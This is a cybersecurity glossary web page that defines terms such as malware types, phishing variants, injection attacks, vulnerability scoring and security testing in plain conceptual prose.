Learn about the commonly used terms in cybersecurity, their definitions, & abbreviations.
This is a type of attack where a hacker exploits a weakness in a network and changes the data on the target. Different types of active attacks can be attempted by threat actors, such as masquerade, session replay, message modification attack, Denial of Service (DoS), Distributed Denial-of-Service (DDoS), etc. In a masquerade attack, a threat actor might pretend to be a user of a system and unauthorized access privileges. A classic example of a masquerade attack would be stealing login ids and passwords through security gaps in programs and bypassing authentication mechanism. Session replay is a kind of an attack where the threat actor steals an authorized user’s log information and its session ID. Using this, the hacker gains access thereby has the authorization to do anything on the user’s account. A message modification attack is a form of attack where a hacker can intercept a message and send it to an entirely different destination or modify the data on a target system. In a Denial of Service (DoS) attack, the users are prevented from accessing a network or a web resource. This attack is achieved by hitting the target with more target than it can handle and thereby disrupting its normal function. In Distributed denial-of-service (DDoS), multiple systems that are compromised will gang up to attack a single target. This is also known as the botnet or zombie army.
Acunetix is a web application testing tool that automatically detects vulnerabilities by analyzing the entire website. This scanner is used as a vulnerability management tool and provides technical and compliance reports.
Advanced Persistent Threat (APT)
A dangerous threat for enterprises where the threat actor possesses a sophisticated level of expertise to continue for an extended period within the system or network without being identified. The target of this kind of threat would be data theft, so there is no damage to the company network. The typical modus operandi of advanced persistent threat is to access the network in several phases. The first is hacking into the network without being detected, planning the attack, mapping the data, and then stealing sensitive data. There is nothing accidental about this type of attack. It is highly customized and carefully planned.
Adware is the kind of malicious software that displays unwanted advertisements to users. On most occasions, these are pop-ups or ads that cannot be closed. Sometimes adware also strikes through browser redirects. Once the user clicks on this advertisement, new tabs will open on its own in your browser, your home page will change, and your search engine will be affected, and you might be led to websites that are not safe to be opened. Adware typically hijacks your system and presents you with advertisements of goods and services tailored to your location and behavior patterns. Adware is generally considered to be a nuisance, but it becomes potentially dangerous when its authors offer your information to a third party who will target you through customized ads and breach your security.
Antivirus software is software designed to scan computers, servers, or devices and remove malicious malware or virus infections such as botnet, spyware, rootkits, and keyloggers. It can integrate both automated and manual filtering abilities. Antivirus software can be distributed in various forms, including standalone antiviruses and internet security suites, that extend protection along with firewall privacy controls.
Techniques used by hackers and threat actors to gain access and infiltrate into your system. The attack method used by threat actors can vary according to the technology, the intent, and the motive behind the attack. The most common types of attacks that threat actors use are Phishing (Spear & Whale), Malware (Ransomware, Trojan, Drive-by-attack), Web Attacks (Injections, Cross-site Scripting, Malicious file upload), Distributed Denial-of-Service (DDoS), Password Attack, Eavesdropping Attack, Birthday Attack, Brute Force & Dictionary Network, Insider Threats, AI-powered, Man-in-the-middle, etc.
Approach or methodology used by threat actors and hackers to exploit a vulnerability. Attack patterns are as diverse as the vulnerabilities that exist within a system or network. They leverage the inherent weakness that exists within its architecture to attack, exploit, and breach security to steal data and gain access.
An attack surface is a set of pathways through which an attacker attempts to enter or extract data from a system, system element, or environment to carry out a cyberattack. The attack surface can be of two types: physical and digital. A physical attack surface covers access to all endpoint devices such as desktops, mobile devices, laptops, USB ports, and improperly disposed hard drives. A digital attack surface includes the entirety of all vulnerabilities that exist in connected hardware and software.
Attack Surface Management
Attack Surface Management (ASM) is the continuous discovery, inventory, classification, prioritization, and security monitoring of your digital ecosystem. With this complete view of your organization’s digital ecosystem, one can discover the corresponding cyber risk associated with each vulnerability, quickly remediate any risk exposure, and help to increase the cybersecurity posture.
This is a security measure designed to verify the user, process, or device identity as a precondition to allow access to confidential data or systems. Primarily, it is used to validate or authorize a user.
A backdoor is a type of undocumented vulnerability point that allows the threat actor to access the entity’s asset by bypassing its security. At times, it is also created by developers to quickly obtain remote access and make changes to the code of the software.
Behavior monitoring continuously monitors the operating system’s unusual modifications or an installed program. It observes user’s activities, information systems, processes, and measures them against organizational policies and rules. Behavior monitoring defends the endpoints through Malware Behavior Blocking and Event Monitoring. Malware Behavior Blocking detects the system over a period and offers an essential layer of threat protection from programs that expose malicious behavior and blocks the associated programs. Event Monitoring is a fundamental approach to protect against unauthorized software and malware attacks by monitoring system areas for specific actions also allow administrators to control programs that trigger such actions.
A birthday attack belongs to the class of brute-force cryptographic attacks and is based on probability theory. The mathematics behind the birthday attack is intended to exploit the communication between two parties found among random attacks. According to probability theory, the birthday paradox deems the probability that some paired individuals in a set of ’n’ randomly selected numbers will have the same birthday.
A black hat hacker penetrates the network maliciously to expose vulnerabilities in systems and networks to discover sensitive information for personal gain.
Black Box Testing
Black box testing is a method of testing software that is performed without any knowledge of the system’s implementation, structure, or design.
A blacklist is a list of blocked components like e-mail addresses, users, passwords, URLs, IP addresses, domain names, and file hashes in which the delivery of emails remains blocked. When this occurs, a user is restricted from sending messages to the intended recipient. An organization might blacklist peer to a peer file share on systems, specific websites, or applications. Contrary to a blacklist, a whitelist permits the components through whatever security gate is being used.
In cryptography, a block cipher encrypts/decrypts its input one block at a time instead of one bit at a time using a symmetric algorithm. During encryption, the shared key is used to convert plaintext input into a ciphertext (encrypted text). Whereas in decryption, the same key is used to convert the ciphertext back into the original plaintext.
A blue team is a bunch of defenders who run an analysis, detect security flaws in information technology, check the effectiveness of security measures and execute defensive measures for future attacks. They constantly strengthen the security around and within the organization’s data systems and networks. Usually, the blue team indicates the internal security team of an organization against the real attackers.
A botnet is a set of internet-connected devices infected by malware and controlled by an attacking party. Botnet owners can command and control the access to thousands of computers to carry out malicious activities. Common botnet actions include email spam, distributed denial-of-service (DDoS) attacks, and targeted intrusions.
A breach is a point where a hacker can successfully exploit a vulnerability in a computer or device to intrude into a system and gain access to its files and networks.
A bug or software error is a security defect that causes a program to deliver unexpected outputs or crash entirely. A malicious attacker can exploit a security bug to gain unauthorized access to the system. These bugs may affect application performance and developers will need to fix all identified bugs before deploying the next version of the application software.
Burp Suite, developed by PortSwigger, is a popular penetration testing tool used to evaluate the security of web applications. It is also one of the most widely used web vulnerability scanners. In the initial mapping and analysis of an application’s attack surface, Burp Suite is used to identify vulnerabilities. It can also intercept HTTP and HTTPS requests and act as a mediator between the user and web pages.
Business Continuity Plan (BCP)
A Business Continuity Plan (BCP) is a document that contains how an organization will operate at the time of any disruptive incident. It comprises the process of prevention and recovery to deal with potential threats and disasters. The BCP plays an important part in the risk management strategy.
Catfishing is a type of identity fraud where a cybercriminal creates a fake online identity to lure someone into a relationship and exploit them. The catfish often uses personally identifiable information, photos, and posts to make their profile seem more genuine to the victim.
Clickjacking is a user interface redress attack where vulnerability hijacks the clicks of a user on a website that efficiently transforms on something malicious or sharing confidential information and makes the user perform actions which they are unaware of. This is a type of online manipulation, where hackers hide malware or malicious code in a legitimate-looking control on a website.
In this type of phishing attack, a legitimate email from an individual or organization is replicated and sent to the target along with malicious links or viruses as attachments. In the target’s inbox, it appears as a re-sent email. When the victim clicks on the attached link, it leads to the installation of malware or ransomware onto the systems. A phisher can use clone phishing to gain access to one of the organization’s computing systems and then infect other systems.
Closed Source Software (CSS)
Closed source software, also known as proprietary software, has its source code encrypted and hidden from the public.
A cloud is a platform that stores a large amount of information and data instead of a local server. Basically, the cloud serves as a remote sharing of files and data when provided with an internet connection.
Common Vulnerability and Exposures
A Common Vulnerability and Exposure (CVE) is an alphanumeric ID assigned by the CVE Numbering Authority (CNA) to refer to a specific software or hardware vulnerability. Once the vulnerability is identified and analyzed, it is listed publicly in MITRE. Then, the information is updated to the National Vulnerability Database (NVD).
Common Vulnerability Scoring System
Common Vulnerability Scoring System (CVSS) is a standard scoring scale of 0–10, which determines the severity and impact of prioritizing vulnerabilities. Vendors release patches and updates for vulnerabilities based on the given CVSS score. The most recent version is CVSS 3.1. The following table presents its breakdown.
|Rating||CVSS V3 Score|
|Critical||9.0 – 10|
|High||7.0 – 8.9|
|Medium||4.0 – 6.9|
|Low||0.1 – 3.9|
Common Weakness Enumeration
Common Weakness Enumeration (CWE) is a global categorization system of weakness found in software and hardware vulnerabilities. Over 600 types of vulnerabilities are available in the source, which is maintained by MITRE corporation and sponsored by National Cybersecurity FFRDC. This process provides the users an understanding of the issues in their software and helps in the development of automated tools to identify, fix, and prevent these issues.
Each of the CWE is classified with an ID and description that gives an overview of the vulnerability type. Some of the categorized vulnerabilities are buffer overflows, path/directory tree traversal errors, cross-site scripting, privilege escalation, and SQL injection.
In cybersecurity, compliance involves meeting the requirements of various rules and regulations enacted by a regulatory authority to protect sensitive data. Compliance requirements vary based on industry and sector and comprise different organizational procedures and technologies to safeguard data. Organizations such as the Center for Internet Security (CIS), the National Institute of Standards and Technology (NIST) under the United States Commerce Department, and ISO 27001 establish compliance regulations.
Computer Network Defense
A Computer Network Defense (CND) is a set of procedures and defensive measures that the system operates to identify, observe, analyze, and stand up against the intrusions. The primary objective of Computer Network Defense is to ensure that no unauthorized, illegitimate user or application has access to a confidential IT environment/network.
Computer Security Incident
An incident that results in prospective peril to the confidentiality, veracity, or accessibility of the information of the system processes, stores, transmit, or that comprises a breach, or imminent threat of violation of security guidelines, security procedures, or acceptable use policies. Attacks such as unauthorized access by someone who is not allowed to access a computer system is also deemed as a potentially threatening computer security incident. When an incident modifies a computer system, a computer security incident response team (CSIRT) must be activated to support and regain control by minimizing the damage.
A cookie is a piece of information collected on a user’s computer by the webserver while surfing a website. Cookies are vital in assisting with more helpful website visits but still a threat to the user’s privacy. Commonly, they are used to swap banner ads and customize pages for the user with the provided information. Cookies can be viewed on the hard disk.
Cross-Site Request Forgery
Cross-Site Request Forgery (CSRF) is a common type of vulnerability on web application vulnerability where an attacker tricks a user into performing unwanted actions or session riding to which the user is logged in. The attacker can carry out a successful CSRF attack by changing requests like transferring funds, changing their email address and passwords, and so forth.
Cryptojacking is a type of cybercrime where hackers hijack cryptocurrency with the use of crypto-mining scripts. This is accomplished by getting the victim to click on a malicious link in an online advertisement or email or by infecting a website that auto-executes commands once loaded. Cryptojacking scripts are usually deployed in web browsers.
Cyber espionage is a type of cyberattack that is executed on government organizations or competitive companies. Ultimately, cyber espionage is performed to spy and steal sensitive information with plans to exploit them for political gains.
Cyber Supply Chain Risk Management
Cyber Supply Chain Risk Management aims to find, evaluate, prevent, and mitigate the risk associated with the distributed and interconnected type of Information and Communications Technology product and service supply chains.
A data breach is a security intrusion in which secure and confidential data such as Personal Health Information (PHI), Personally identifiable information (PII), trade secrets of organizations, intellectual property, and financial data gets released to the unauthorized environment. The data leak or unauthorized access may be due to the incautious disposal of used computer equipment and data storage media.
Data leakage is the illegitimate transmission of data from an organization to a peripheral recipient. These threats usually occur electronically or physically through mobile data storage devices such as optical media, USB keys, and laptops.
Data loss occurs when sensitive information on a computer is exploited due to theft, human error, viruses, malware, or power failure. This includes laptop theft, accidental deletion, overwriting of files, power outages and surges, spilled liquids, and sudden failure of hard drives.
Data Loss Prevention (DLP)
Data Loss Prevention (DLP) is a policy that ensures end users do not send confidential or sensitive information beyond the organization network. This strategy involves a combination of user, security policies, and security tools.
Deceptive phishing attacks are scam emails sent in bulk that request their victims to provide personal details, verify their account, or change an account password. Attackers use deceptive phishing emails in an extensive campaign and exploit those victims that respond to their scam.
Deepfake is the type of artificial intelligence used to fabricate one’s existing video or picture to resemble someone else. This type of visual and audio content manipulation is potentially achieved with the techniques of machine learning. The methods used to create deepfakes are rooted from deep learning and guidance from generative neural network architectures, such as autoencoders or generative adversarial networks.
The merged processes of Development, Security, and Operations are collectively referred to as DevSecOps. It is the practice of continuously implementing automated security within the development and operations stages of an application. It aims to optimize the entire app life cycle, secure codes and eliminate vulnerabilities, and ensure faster product delivery by integrating information security from development to deployment.
Digital Attack Surface
The digital attack surface is the total number of security vulnerabilities found outside the firewall that can be accessed through the internet. The possible entry points of vulnerabilities are unnecessary open ports, poor email security, code, servers, and websites.
DNS Based Phishing
A DNS-based phishing attack, also known as pharming, involves hackers using a duplicate of a legitimate website to acquire the user’s IP address. The DNS in the system network is usually used to translate domain names into IP addresses for computer communications. In this type of attack, users remain unaware that they are entering their personal information in a redirected fraudulent website, giving long-term access to the attacker.
A domain name is an internet or web address that is part of the URL (domain.com) followed by an extension (.com) that identifies computers on the website.
Encryption is the process of converting information, or a message referred to as plaintext, into a problematic unreadable form called ciphertext by using an encryption algorithm
Enterprise Risk Management
Enterprise risk management (ERM) is a plan-based business strategy to detect, evaluate, and organize for any threats, vulnerabilities, and other possibilities for disaster that may intrude on an organization’s operations and ideas. ERM handles the activities of an organization to reduce the influence of threat on financing and profits.
Event monitoring is a fundamental approach to protect against unauthorized software and malware attacks. It monitors system areas for specific events allowing administrators to control programs that trigger such events.
An exploit refers to any piece of code designed to take advantage of security flaws or software vulnerabilities. These codes are typically written by security researchers as a proof of concept or crafted by threat actors for malicious operations. Exploits enable attackers to gain elevated access to a network and can help them to move laterally to compromise an organization’s entire IT infrastructure. Common exploits include SQL Injection, Cross-Site Scripting, and Cross-Site Request Forgery.
Exploit kits are malicious toolkits developed by hackers to automatically exploit known vulnerabilities in software and systems. Each kit contains a collection of automated exploits that can be rapidly deployed to launch an attack. Exploit kits are popular remote access tools and are used in group malware attacks due to their highly automated nature, which serves as a low-security barrier for attackers to silently enter a network.
Exploitation analysis refers to the calculated assessment of all collected information to identify any vulnerabilities and gaps with the potential for exploitation.
A firewall is a network security device that monitors incoming and outgoing network traffic. It is the first line of defense in cybersecurity and acts as a barrier between a private and trusted network and an untrusted source (such as the Internet). Based on structure and functionality, firewalls can be of different types, such as:
- Packet-filtering firewalls
- Next-generation firewalls
- Stateful multilayer inspection firewalls
- Host-based firewalls
Forensic is a scientific test used in connection with the detection of crime. Cyber forensics is a technique used to determine and expose scientific criminal evidence.
Grey hat or Gray hat is a computer security expert who violates laws or common ethical principles but does not have the malicious intent typical of a black hat hacker. They have similar intentions as white hats to maintain secure systems but without permissions.
A greylist is a method of securing e-mail users against spams. Comprises of items such as e-mail addresses, users, passwords, URLs, IP addresses, domain names, and file hashes that are temporarily blocked or allowed until an additional retrieval step.
A hacker is an individual who breaks through the security of a network or system to sneak data, corrupt systems or files, capture the environment or disrupt data-related activities by the phishing scam, spooking, trojan horse, vulnerability scanning, viruses, etc. Ethical hackers, on the contrary, are employed by organizations to prevent malicious infections.
Hashcat is a password-cracking tool that had a codebase until 2015 but was then released as open-source software. It performs different types of attacks including brute-forcing and dictionary attacks with hash values of passwords suggested by its algorithm.
In cybersecurity terminology, a honeypot refers to a security system, a decoy for the attackers. It lures the hackers and wastes their time as they try to gain unauthorized access to the network.
ICT Supply Chain Threat
An Information and Communications Technology supply chain is a human-made threat where an adversary exposes the confidentiality, integrity, or accessibility of a system or the information the system handles, stores, or transmits. The threat can occur within the system development life cycle of the product or service. Cyber Supply Chain Risk Management is the method of finding, evaluating, preventing, and mitigating the risk associated with the distributed and interconnected type of Information and Communications Technology (ICT) product and service supply chains.
Identity cloning is a type of identity theft where an individual attempts to impersonate someone else to hide their true identity.
An incident is an act of violating an organization’s security policy to affect its integrity, information systems, services or networks, and sensitive information by unauthorized access. It results in adverse outcomes to the information that the system possesses, which requires a response action to mitigate the consequences. The incident can be security issues, application bugs, data issues, system down, server problems, etc.
Incident management is a service management region that gets activated when an incident has occurred. The key objective is to rebuild the normal service operations at the earliest possible time. Incidents include disruptions reported by users, by technical staff, or automatically detected and reported by event monitoring tools. When incidents are reported, the incident management process attempts to understand the impact and urgency of the incident to perform accordingly.
Internet Protocol Addresses
An Internet Protocol (IP) address is a numerical identification that is allocated to each computer connected to the internet. IP addresses enable computers to send and receive information and can also be used to track down a user’s location. IPs are represented in notations assigned by network administrators.
Java serialization is a process of built-in feature where the Java code object is converted into a byte stream to transfer the object code from one Java virtual machine to another and reconstruct them using the process of deserialization. Java serialized data streams support encryption, compression, authentication, and secure Java computing.
A Jump Bag is a container that contains the essential items to act in response to an incident and reduce the effects of delayed reactions.
Keylogger is a sneaky type of spyware that records and steals consecutive PC activity that the user enters on a device. They are not always illicit to install and use. It is a common tool for corporations wherein the information technology uses to troubleshoot technical problems on their systems and networks or to keep an eye on employees secretively. It can record online conversations, e-mails, password logins, screenshots, web pages that you view, as well as sensitive financial information.
Lateral movements are techniques used by high-tech cyber-attacker to gradually step laterally through a network seeking targeted critical data and assets. This methodology additionally requires the credentials of the user account. In this type of attack, the threat actors get access to the domain controller and provide control of windows-based infrastructure, which involves better strategies and evade detection. To mitigate lateral movement attacks, security analysts can create internal network intelligence to know which users and devices are on a network and standard login patterns to identify when credential misuse occurs.
A Macro virus is a system virus that is in a programming language used to infect software applications (Excel, Word) that cause malicious programs to run as soon as the documents are opened because macro viruses change prompt commands. There are two types of macro viruses – such as the Concept virus that targets the Microsoft Word and the Melissa virus that spreads through e-mails. A macro virus can generate new files, corrupt data, move text, send files, format hard drives, and insert pictures. One of their standard operations is delivering destructive viruses and malware.
An applet is an application program that is small, which attacks the local system of a web surfer. Any applet that performs an action against the will of the Java user should be considered as a malicious applet. Malicious applets include Denial of Service, invasion of privacy, annoyance, and damage to Java users. In this applet’s attacks, issues like play sound files continuously, set up threads that monitor your Web use, and display unwanted graphics on your screen are caused.
Malicious code is a system code or web script intended to cause undesired vulnerabilities, application backdoor, security breaches or damage to a system, and potential data loss. Unfortunately, all types of codes cannot be detected by anti-virus applications on their own. Malicious code takes the form of Java Applets, ActiveX Controls, Scripting languages, Browser plug-ins, and Pushed content. Malicious code can give a user remote access to a computer known as an application backdoor.
Malware is used to hide the hacker’s footprints within the system, and it also aids the attacker control their access remotely and identify the data they wish to steal.
Malware Based Phishing
In malware-based phishing, an attacker utilizes a duplicated email or fake website to lure victims into clicking on download links that will install malware in the victim’s computing system. The installed malware can use keylogger and screen logger programs to record keyboard strokes for account logins and passwords and track the user’s actions. These recorded actions are transmitted to the attacker, who will then use the information to exploit the target.
Malware Behavior Blocking
Malware Behavior Blocking detects the system over a period and offers an essential layer of threat protection from programs that expose malicious behavior and blocks the associated applications.
Metasploit is a significant tool used in penetration testing that provides information on security vulnerabilities. This tool makes hacking simple for probing and infiltrating the network or server that aids both the blue and red teams.
Network resilience is the capability of the network to defend, maintain a level of service in rapid recovery when failures occur, and meet unpredictable demands. To increase resilience, the possible challenges and risks must be identified, and proper resilience measures should be defined.
A NOP sled, NOP slide, or NOP ramp stands for No-operation, a sequence of instructions to direct the CPU’s execution actions to its desired destination. This technique is commonly used in software exploits, which directs program execution when a branch instruction target is not known precisely. A branch instruction is a program instruction that causes a system to execute an unusual instruction sequence, which differs from its default behavior of execution.
Obfuscation is the process of transforming a program code into a complicated form, while the program’s function remains the same. The purpose of obfuscation is to secure data and anonymize cyberattacks as well as defend them from the threat actors. This makes hackers challenging to detect and analyze the program.
An outsider threat is an unauthorized group or individual who seeks and obtains access to sensitive information of the organization rather than the security team. The rate of external attackers is high to an organization that includes well-funded hackers, organized crime groups, etc. The primary objective of outsider threat is cyber espionage, where they spy the protected data and confidential information.
Open Web Application Security Project (OWASP)
The Open Web Application Security Project (OWASP) is an organization that provides a regularly updated list of the most persistent application security concerns. Security experts from around the world are members of this project and they contribute their knowledge of threats, weaknesses, and countermeasures and help the industry by building awareness about software vulnerabilities.
When data is transmitted over the network, it breaks into smaller units at the sender’s node called data packets and gets reassembled at the receiver’s node in the original format. The process of capturing these data packets by intercepting the traffic on a network is called packet sniffing. A packet sniffer can also be called a packet analyzer or network analyzer.
A passive attack is a type of cyber-attack where the threat actor simply observes the network activity as a part of surveillance. A passive attacker aims to obtain information that is transmitted. They are not easily detected because threat actors do not actively attack any target machine or participate in network traffic. They can also monitor every single message or data that is sent or received in the communication, but they cannot modify the original message.
Penetration testing is a cybersecurity test performed by the security team to attack against your computer system to analyze for exploitable vulnerabilities. It is best to have a penetration test done by security experts because they may be able to expose blind spots undetected by the developers who built it. The penetration test is performed by the contractors referred to as ethical hackers. The penetration tester runs several tests based around network penetration, penetration methods, and complete assessment reports about what they have revealed.
Phone phishing, one of the most commonly used phishing attacks, attempts to trick the user with attention-grabbing text messages demanding their immediate action. Typically, these messages ask the user to pay a registration fee and/or share their personal and financial details. For instance, phishers can trick users into believing that they have won a prize, and need to share personal information to claim it. When threat actors resort to using voice messages or phone calls to scam their target, it is referred to as vishing.
Physical Attack Surface
When an attacker uncovers security vulnerabilities by obtaining physical access to the system or device through the server rooms or office devices, the total number of weaknesses found through physical access is known as the physical attack surface.
An attacker can obtain access due to the carefree disposal of user data and login credentials, physical break-in, rogue employees, social engineering ploys, and intruders. Organizations can protect their physical attack surface through surveillance around their physical environment and access control.
Privilege escalation increases the level of access to system resources attained by exploiting a vulnerability in the system. The exploitation of a programming error, vulnerability, flaw, access control in an operating system, or application to gain unauthorized access that is restricted from the application or user is described as privilege escalation. There are two types of privilege escalation, such as horizontal privilege escalation and vertical privilege escalation. Horizontal privilege escalation – a threat actor develops privileges by taking over another account and misusing the legal privileges granted to the other user. Vertical privilege escalation- a threat actor attempts to acquire more permissions or access with an existing account that has been compromised.
Ransomware is a malicious virus that disrupts the user’s computer or server by installing itself and then accessing the sensitive information. Once installed, it displays a message that demands a ransom for the retrieval. There are several different categories of ransomware, including: 1. The encryptors that block access to data and applications by encrypting devices. 2. Lockers are the ones that block access to a computer system. 3. Scareware claims to discover other malware like viruses on your computer and then demands money to get rid of them. 4. Doxware that robs sensitive information from your computer and threatens to release it.
Risk-Based Vulnerability Management (RBVM)
Risk-Based Vulnerability Management (RBVM) is a cybersecurity strategy in which a risk-based approach is adopted to prioritize remediation and reduce vulnerabilities across the attack surface. RBVM uses machine learning to map asset criticality, vulnerability severity, and threat actor activity. It assesses vulnerability risks by threat context and provides insight about the potential business impact for each threat identified. Through this process, companies and organizations can track their cyber resilience and get solutions to improve their security posture.
Recovery is the process of restoration of data after an incident or event in the short or long term. The incidents can be a natural disaster or cyber-attacks.
A red team is a group of ethical hackers who attack your layered security controls while your blue team defends it. Their objectives are to discover and exploit the weakness in the organization’s security. A red team emulates the adversary’s attack against the organization’s security posture.
A rootkit is a set of malicious applications or tools that allow attackers to gain access to the restricted zones of computers or systems, simultaneously hiding their presence. This can even be installed remotely as a malware infection that gains complete access to the device. Some of the rootkits are keyloggers, banking credential stealers, password stealers, antivirus disablers, and bots for Distributed Denial of Service (DDoS) attacks.
Software-as-a-Service (SaaS) is the cloud-based software that delivers services to organizations without the need to purchase the application, server, or platform. SaaS providers offer business services such as Customer Relationship Management (CRM), Enterprise Resource Planning (ERP), billing, and sales.
It is the machine-based execution of security tasks with the power to detect, investigate, and remediate cyber threats with or without human intervention by identifying incoming risks, triaging and prioritizing alerts as they emerge, and responding to them a timely fashion.
Security Testing is a process of evaluating computer networks, software, applications and systems to identify any potential loopholes and weaknesses that could be exploited by an intruder. It aims to improve cyber security defenses and highlights all vulnerabilities, risks, and threats using manual and automated security testing tools. Penetration testing is a typical example of security testing.
Typically, security testing of information systems follow these six basic principles:
Server-Side Request Forgery (SSRF)
Server-Side Request Forgery (SSRF), a web security vulnerability in which the attacker induce the server to create a connection back to itself, or to other web-based services within the organization’s infrastructure, or to external third-party systems. The target application is capable of importing data from an URL, deploying data to a URL, or otherwise interpreting data from a URL that can be tampered with.
In session hijacking, an attacker takes over a user’s session by compromising the web session control mechanism of the user and exploiting it. To perform this, the attacker requires the user’s session ID, which can be obtained by stealing the session cookie or by click-jacking. This attack is commonly applied to browser sessions and web applications. For example, an attacker can capture a user’s banking application’s web session and gain privileged access.
Shift Left is a unique approach to security testing and involves early testing during the Software Development Life Cycle. The primary intention of shift left testing is to detect security defects or vulnerabilities in the initial stage, and thereby rectify and improve the quality and security of the software. It aims to reduce any negative outcome and help deploy the application or software at the scheduled time.
Spear phishing is a phishing attack against a well-researched target to obtain sensitive data, such as financial credentials or personal identification information, and gain access to the target’s computer system. In spear phishing, threat actors pretend to be trustworthy entities and reach out to the target through email, text, or instant message.
Spoofing is a kind of forgery or falsifying in which the person fabricates the sending address of transmission to obtain illegal entry into a secure system. IP and e-mail spoofing are commonly used techniques. In the case of technology, the e-mails which appeared from the bank or any other source that the user believes can be made and sent by black hats.
Spyware is software that collects information about an individual or organization without their knowledge. Using spyware, sensitive or confidential information can be sent to another destination for malicious purposes.
An SQL injection (Query Injection) stands for Structured Query Language, a web hacking technique where the attacker injects SQL statements that can read or modify the database. With advanced SQL Injection attacks, the hackers use SQL commands to write arbitrary files to the server and even execute operating system commands. Therefore, a successful SQL injection leads to serious business outcomes, involving data loss, information disclosure, and significant financial implications.
A threat is a possible event or circumstance that might exploit a vulnerability to violate an organization’s security protocols. A threat can be intentional (individual hacker or an illegal organization) or accidental (malfunctioning or of a natural disaster).
A Trojan horse code is malware that deceives users of its real intent. They penetrate your network to gain access to your system in the future. They sit silently in your computer, gathering information or setting up holes in your security, or they may seize your computer and lock you out.
Tunneling is a technology that enables the network to send data through another network’s connections. It works by capturing a network protocol within packets supported by the second network.
Unauthorized access refers to a person who obtains access to a website, program, server, service, or any confidential information of any other user without their concern. Some set up alarms when authorized access attempts to interrupt, which helps prevent hackers from gaining access.
A virus is a malicious software which consists of codes attached to the legitimate programs. When the program starts to run, the virus begins to spread all over the computer files without user knowledge. Viruses also circulate through shared media, such as Universal Serial Bus (USB) drives. Installing anti-virus software prevents to stop or eliminate previously installed viruses.
Vulnerability is a weakness or flaw or fault in the system which can be exposed to an attacker. Vulnerabilities can allow attackers to gain unauthorized access and run code, enter a system’s memory, install malware, steal, destroy, or modify sensitive data. Employees can protect computer systems from vulnerabilities by updating software security patches up to date. Vulnerabilities can be exploited by methods such as SQL injection, buffer overflows, and cross-site scripting (XSS).
A vulnerability assessment is an organized analysis of security weaknesses in computer networks, systems, hardware, applications, and other parts of the IT network. It usually leverages tools like vulnerability and protocol scanners to identify threats and flaws within an organization’s IT infrastructure and prioritize risks for potential remediation in the proper context. Types of Vulnerability assessment includes: 1. Host assessment 2. Network and wireless assessment 3. Database assessment 4. Application scans
Vulnerability management is a set of processes that help identify and classify all weaknesses in your software, systems, and networks and then mitigate them by implementing security measures. Vulnerability scanning is a proactive process under the vulnerability management of software, to analyze the possible vulnerabilities such as insecure configurations.
Web trojan phishing attacks are executed through pop-ups while the user surfs a website. Web trojans can make a user’s session available to an attacker. For instance, when a user clicks on a pop-up while performing bank transactions, it records all private information and transmits it back to the attacker.
The white hat is an individual who intrudes into systems and networks at the demand of their organization or with explicit permission to determine how secure it is against illegal attackers.
A white team is a group in charge of refereeing a situation between a red team of attackers and a blue team of actual defenders of information systems.
A whitelist permits the components like e-mail addresses, users, passwords, URLs, IP addresses, domain names, and file hashes through whatever security gate is being used. When a whitelisted, all entities are denied, except those included in the whitelist.
XML External Entity (XXE)
An XML External Entity attack is a type of web security vulnerability where the attack against an application that parses XML input. This attack ensues when XML input containing a reference to an external entity is processed by a delicately configured XML parser. By leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks, an attacker can accelerate an XXE attack to compromise the underlying server or other back-end infrastructure. This attack may head to the disclosure of private data, denial of service, server-side request forgery, port scanning from the viewpoint of the machine where the parser is located, and additional system impacts.
XSS (Cross-Site Scripting)
Cross-Site Scripting is a kind of injection attack in which the threat actor injects malicious scripts into benign and trusted websites. It succeeds through security vulnerabilities in Web applications and is exploited by injecting a client-side script into web pages used by other users This attack extends into account hijacking, cookie theft, false marketing, and modifications in the system settings of the user’s account.
YubiKey is the first security key that enables a strong two factor and multi-factor authentication without the necessity of passwords. It is a small USB device that supports authentication protocols to secure access to computers, networks, websites, VPN, password managers, and other online services.
In the cyber-attacks world, a zero-day is the day when a vulnerability is discovered before the vendor has become aware of it. At that point, no patch exists, so threat actors can easily exploit the vulnerability knowing that no protections are in place. This makes zero-day vulnerabilities a severe security threat. After some days, letting the vulnerability to be patched, the assessment report is published, and a CVE number is assigned.